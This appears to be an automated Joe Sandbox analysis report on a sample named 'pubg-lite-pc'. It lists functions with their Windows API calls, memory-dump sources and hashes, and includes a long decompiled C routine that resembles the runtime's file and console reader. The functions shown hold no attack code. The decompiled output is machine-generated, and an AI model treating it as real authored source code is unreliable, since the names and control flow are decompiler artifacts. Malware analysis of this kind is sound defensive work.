                                                                                                Function 009767F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001104,00000001,?), ref: 00976843
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00976888
                                                                                                • SendMessageW.USER32(?,0000110A,00000004,?), ref: 0097689C
                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 009768B6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: @
                                                                                                • API String ID: 3850602802-2766056989
                                                                                                • Opcode ID: 68cb23281fce0331b8e52919a127e21a64c58baa7f2457ad609218fa7c887954
                                                                                                • Instruction ID: 689408c2649b99cc847b3bd58ec0c367cdbc0e63c5b3bc35fd6d8e7b35ef50cb
                                                                                                • Opcode Fuzzy Hash: 68cb23281fce0331b8e52919a127e21a64c58baa7f2457ad609218fa7c887954
                                                                                                • Instruction Fuzzy Hash: 10218E71A04704ABD721CF11CD85BABBBF9FFD9B04F00552DFA5456290EAB2D844CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00999220 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74libraryloaderwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(SetWindowTheme), ref: 009992ED
                                                                                                • SendMessageW.USER32(46B30035,0000112C,00000004,00000004), ref: 00999329
                                                                                                  • Part of subcall function 00A45A61: EnterCriticalSection.KERNEL32(00B0282C,?,?,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45A6C
                                                                                                  • Part of subcall function 00A45A61: LeaveCriticalSection.KERNEL32(00B0282C,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45AA9
                                                                                                  • Part of subcall function 009749D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00974A11
                                                                                                  • Part of subcall function 00A45A17: EnterCriticalSection.KERNEL32(00B0282C,?,?,00929407,00B0345C,00A9C710), ref: 00A45A21
                                                                                                  • Part of subcall function 00A45A17: LeaveCriticalSection.KERNEL32(00B0282C,?,00929407,00B0345C,00A9C710), ref: 00A45A54
                                                                                                  • Part of subcall function 00A45A17: RtlWakeAllConditionVariable.NTDLL ref: 00A45ACB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$AddressConditionDirectoryMessageProcSendSystemVariableWake
                                                                                                • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                                                • API String ID: 1566958886-3123591815
                                                                                                • Opcode ID: 0c76df54ddab3a297cc71098dad14181256c748a1f3b0b5a7a36909987235b6f
                                                                                                • Instruction ID: 2e53d3bc71b647b540b2c2016b1071ca94e6a1877b9cf057272fb1d8223b8ef7
                                                                                                • Opcode Fuzzy Hash: 0c76df54ddab3a297cc71098dad14181256c748a1f3b0b5a7a36909987235b6f
                                                                                                • Instruction Fuzzy Hash: A321D671B40644FBCB10DF6CDD4AB4D7BECEB54B20F100325E561A76E1DB749A108B95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A49BEC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00A49CAD,?,?,00000000,?,?,00A49D5F,00000002,FlsGetValue,00AA0008,00AA0010), ref: 00A49C7C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 3664257935-2084034818
                                                                                                • Opcode ID: 1237fdd63655f98a60eaef75080cc1f533b5b7697795de449d10552b67f2061d
                                                                                                • Instruction ID: 01a5e1ff17019c58543958ddce73e1b451f31862302679683b881200fc2e608b
                                                                                                • Opcode Fuzzy Hash: 1237fdd63655f98a60eaef75080cc1f533b5b7697795de449d10552b67f2061d
                                                                                                • Instruction Fuzzy Hash: 7511CA39B81625AFDF22DB689CC4B5B37E49F81770F250161E911EB2C1DB70ED1186D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A54D61 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00A54D56,?,?,00A54D1E,?,?,?), ref: 00A54D76
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A54D89
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00A54D56,?,?,00A54D1E,?,?,?), ref: 00A54DAC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 9cbd5d4cbac0d88ece77d98dacb57c16d86e8aefc30d3e9cf047f7e960508483
                                                                                                • Instruction ID: adca6a35c00148816d7b4c6de8fd0e50e7448b3a21396af3b6d08dd7577ef623
                                                                                                • Opcode Fuzzy Hash: 9cbd5d4cbac0d88ece77d98dacb57c16d86e8aefc30d3e9cf047f7e960508483
                                                                                                • Instruction Fuzzy Hash: D4F08C32601228FBDF15DB95DC0DBDD7A79FB0475AF004065E800A21A0CB708F55DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A45AE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SleepConditionVariableCS.KERNELBASE(?,00A45A86,00000064), ref: 00A45B0C
                                                                                                • LeaveCriticalSection.KERNEL32(00B0282C,?,?,00A45A86,00000064,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45B16
                                                                                                • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00A45A86,00000064,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45B27
                                                                                                • EnterCriticalSection.KERNEL32(00B0282C,?,00A45A86,00000064,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45B2E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                • String ID: @,w
                                                                                                • API String ID: 3269011525-1809401727
                                                                                                • Opcode ID: 63fa78c56f602331afa522d626c88c2e7753c00333b09f335a0214bac663eb47
                                                                                                • Instruction ID: d848b2a85fa60410b41ca6c3a236d03c884d695496b27b50ecbf9ed9dd3adc41
                                                                                                • Opcode Fuzzy Hash: 63fa78c56f602331afa522d626c88c2e7753c00333b09f335a0214bac663eb47
                                                                                                • Instruction Fuzzy Hash: 9EE09B3AB41624BBCE02DBD0EC0CADD3F69DF087607004062F505561728E61180A8BD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D9A4D29 Relevance: 7.8, APIs: 5, Instructions: 301COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E6D9A4D29(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = L6D991446(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(L6D991459( *_t137))) = 9;
						L60:
						_t139 = L6D98EB7F();
						goto L61;
					}
					__eflags = _t198 -  *0x6d9efb98; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x6d9ef998 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(L6D991446(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(L6D991459(__eflags))) = 0x16;
								L6D98EB7F();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E6D9970BE(_t154);
								L6D997084(0);
								L6D997084(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = L6D99EA65(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x6d9ef998 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x6d9ef998 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x6d9ef998 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6d9ef998 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x6d9ef998 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6d9ef998 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x6d9ef998 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = L6D9A1CEE(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													L6D991423(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(L6D991459(__eflags))) = 9;
											 *(L6D991446(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x6d9ef998 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E6D9A4894();
												} else {
													_t170 = E6D9A4B9A();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = L6D9A4A43(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x6d9ef998 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(L6D991459(__eflags))) = 0xc;
									 *(L6D991446(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									L6D997084(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x6d9ef998 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(L6D991446(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(L6D991459(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(L6D991446(_t246)) =  *_t197 & 0x00000000;
					_t139 = L6D991459(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}





















































                                                                                                0x6d9a4d32
                                                                                                0x6d9a4d36
                                                                                                0x6d9a4d39
                                                                                                0x6d9a4d53
                                                                                                0x6d9a4d55
                                                                                                0x6d9a50ba
                                                                                                0x6d9a50ba
                                                                                                0x6d9a50bf
                                                                                                0x6d9a50bf
                                                                                                0x6d9a50c7
                                                                                                0x6d9a50cd
                                                                                                0x6d9a50cd
                                                                                                0x00000000
                                                                                                0x6d9a50cd
                                                                                                0x6d9a4d5b
                                                                                                0x6d9a4d61
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a4d6b
                                                                                                0x6d9a4d71
                                                                                                0x6d9a4d74
                                                                                                0x6d9a4d77
                                                                                                0x6d9a4d81
                                                                                                0x6d9a4d84
                                                                                                0x6d9a4d87
                                                                                                0x6d9a4d8b
                                                                                                0x6d9a4d8d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a4d93
                                                                                                0x6d9a4d96
                                                                                                0x6d9a4d9c
                                                                                                0x6d9a4db6
                                                                                                0x6d9a4db8
                                                                                                0x6d9a50b6
                                                                                                0x00000000
                                                                                                0x6d9a50b6
                                                                                                0x6d9a4dbe
                                                                                                0x6d9a4dc1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a4dc7
                                                                                                0x6d9a4dcb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a4dd1
                                                                                                0x6d9a4dd4
                                                                                                0x6d9a4dd8
                                                                                                0x6d9a4ddf
                                                                                                0x6d9a4de1
                                                                                                0x6d9a4de1
                                                                                                0x6d9a4de4
                                                                                                0x6d9a4e39
                                                                                                0x6d9a4e3b
                                                                                                0x6d9a4e01
                                                                                                0x6d9a4e06
                                                                                                0x6d9a4e0d
                                                                                                0x6d9a4e13
                                                                                                0x00000000
                                                                                                0x6d9a4e3d
                                                                                                0x6d9a4e3f
                                                                                                0x6d9a4e40
                                                                                                0x6d9a4e42
                                                                                                0x6d9a4e45
                                                                                                0x6d9a4e47
                                                                                                0x6d9a4e49
                                                                                                0x6d9a4e4b
                                                                                                0x6d9a4e4b
                                                                                                0x6d9a4e56
                                                                                                0x6d9a4e58
                                                                                                0x6d9a4e5f
                                                                                                0x6d9a4e64
                                                                                                0x6d9a4e67
                                                                                                0x6d9a4e6a
                                                                                                0x6d9a4e6c
                                                                                                0x6d9a4e90
                                                                                                0x6d9a4e98
                                                                                                0x6d9a4e9b
                                                                                                0x6d9a4ea2
                                                                                                0x6d9a4ea9
                                                                                                0x6d9a4ead
                                                                                                0x6d9a4eaf
                                                                                                0x6d9a4eb2
                                                                                                0x6d9a4eb9
                                                                                                0x6d9a4eb9
                                                                                                0x6d9a4ebc
                                                                                                0x6d9a4ebe
                                                                                                0x6d9a4ec1
                                                                                                0x6d9a4ec6
                                                                                                0x6d9a4ec9
                                                                                                0x6d9a4ed2
                                                                                                0x6d9a4ed6
                                                                                                0x6d9a4ed9
                                                                                                0x6d9a4edb
                                                                                                0x6d9a4ee1
                                                                                                0x6d9a4ee3
                                                                                                0x6d9a4eec
                                                                                                0x6d9a4eed
                                                                                                0x6d9a4eef
                                                                                                0x6d9a4ef3
                                                                                                0x6d9a4ef4
                                                                                                0x6d9a4ef8
                                                                                                0x6d9a4efb
                                                                                                0x6d9a4f05
                                                                                                0x6d9a4f0a
                                                                                                0x6d9a4f0d
                                                                                                0x6d9a4f1c
                                                                                                0x6d9a4f20
                                                                                                0x6d9a4f23
                                                                                                0x6d9a4f25
                                                                                                0x6d9a4f27
                                                                                                0x6d9a4f29
                                                                                                0x6d9a4f2e
                                                                                                0x6d9a4f30
                                                                                                0x6d9a4f34
                                                                                                0x6d9a4f35
                                                                                                0x6d9a4f3b
                                                                                                0x6d9a4f45
                                                                                                0x6d9a4f46
                                                                                                0x6d9a4f49
                                                                                                0x6d9a4f4e
                                                                                                0x6d9a4f51
                                                                                                0x6d9a4f60
                                                                                                0x6d9a4f64
                                                                                                0x6d9a4f67
                                                                                                0x6d9a4f69
                                                                                                0x6d9a4f6b
                                                                                                0x6d9a4f6d
                                                                                                0x6d9a4f6f
                                                                                                0x6d9a4f75
                                                                                                0x6d9a4f75
                                                                                                0x6d9a4f76
                                                                                                0x6d9a4f85
                                                                                                0x6d9a4f88
                                                                                                0x6d9a4f89
                                                                                                0x6d9a4f89
                                                                                                0x6d9a4f6d
                                                                                                0x6d9a4f69
                                                                                                0x6d9a4f51
                                                                                                0x6d9a4f29
                                                                                                0x6d9a4f25
                                                                                                0x6d9a4f0d
                                                                                                0x6d9a4ee3
                                                                                                0x6d9a4edb
                                                                                                0x6d9a4f8f
                                                                                                0x6d9a4f95
                                                                                                0x6d9a4f97
                                                                                                0x6d9a500a
                                                                                                0x6d9a500a
                                                                                                0x6d9a500e
                                                                                                0x6d9a501e
                                                                                                0x6d9a5024
                                                                                                0x6d9a5026
                                                                                                0x6d9a5082
                                                                                                0x6d9a5082
                                                                                                0x6d9a508a
                                                                                                0x6d9a508b
                                                                                                0x6d9a508d
                                                                                                0x6d9a50a6
                                                                                                0x6d9a50a9
                                                                                                0x6d9a4fe6
                                                                                                0x6d9a4fe7
                                                                                                0x00000000
                                                                                                0x6d9a4fec
                                                                                                0x6d9a50af
                                                                                                0x00000000
                                                                                                0x6d9a50af
                                                                                                0x6d9a5094
                                                                                                0x6d9a509f
                                                                                                0x00000000
                                                                                                0x6d9a509f
                                                                                                0x6d9a5028
                                                                                                0x6d9a502b
                                                                                                0x6d9a502e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a5030
                                                                                                0x6d9a5030
                                                                                                0x6d9a5033
                                                                                                0x6d9a5036
                                                                                                0x6d9a5039
                                                                                                0x6d9a5040
                                                                                                0x6d9a5045
                                                                                                0x6d9a5047
                                                                                                0x6d9a504b
                                                                                                0x6d9a5066
                                                                                                0x6d9a506a
                                                                                                0x6d9a506b
                                                                                                0x6d9a506e
                                                                                                0x6d9a506f
                                                                                                0x6d9a507b
                                                                                                0x6d9a5071
                                                                                                0x6d9a5071
                                                                                                0x6d9a5071
                                                                                                0x6d9a504d
                                                                                                0x6d9a504d
                                                                                                0x6d9a504d
                                                                                                0x6d9a5058
                                                                                                0x6d9a505d
                                                                                                0x6d9a5060
                                                                                                0x6d9a5060
                                                                                                0x00000000
                                                                                                0x6d9a5045
                                                                                                0x6d9a4f9c
                                                                                                0x6d9a4f9f
                                                                                                0x6d9a4fa6
                                                                                                0x6d9a4fab
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a4fb4
                                                                                                0x6d9a4fba
                                                                                                0x6d9a4fbc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a4fbe
                                                                                                0x6d9a4fc2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a4fd6
                                                                                                0x6d9a4fdc
                                                                                                0x6d9a4fde
                                                                                                0x6d9a5002
                                                                                                0x6d9a5005
                                                                                                0x00000000
                                                                                                0x6d9a5005
                                                                                                0x6d9a4fe0
                                                                                                0x00000000
                                                                                                0x6d9a4e6e
                                                                                                0x6d9a4e73
                                                                                                0x6d9a4e7e
                                                                                                0x6d9a4fed
                                                                                                0x6d9a4fed
                                                                                                0x6d9a4fed
                                                                                                0x6d9a4ff0
                                                                                                0x6d9a4ff1
                                                                                                0x00000000
                                                                                                0x6d9a4ff9
                                                                                                0x6d9a4e6c
                                                                                                0x6d9a4e3b
                                                                                                0x6d9a4de6
                                                                                                0x6d9a4de9
                                                                                                0x6d9a4dfd
                                                                                                0x6d9a4dff
                                                                                                0x6d9a4e20
                                                                                                0x6d9a4e23
                                                                                                0x6d9a4e26
                                                                                                0x6d9a4e29
                                                                                                0x00000000
                                                                                                0x6d9a4e29
                                                                                                0x00000000
                                                                                                0x6d9a4deb
                                                                                                0x6d9a4deb
                                                                                                0x6d9a4dee
                                                                                                0x6d9a4df1
                                                                                                0x00000000
                                                                                                0x6d9a4df1
                                                                                                0x6d9a4de9
                                                                                                0x6d9a4d9e
                                                                                                0x6d9a4da3
                                                                                                0x6d9a4dab
                                                                                                0x00000000
                                                                                                0x6d9a4d3b
                                                                                                0x6d9a4d40
                                                                                                0x6d9a4d43
                                                                                                0x6d9a4d48
                                                                                                0x6d9a50d2
                                                                                                0x00000000
                                                                                                0x6d9a50d2

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
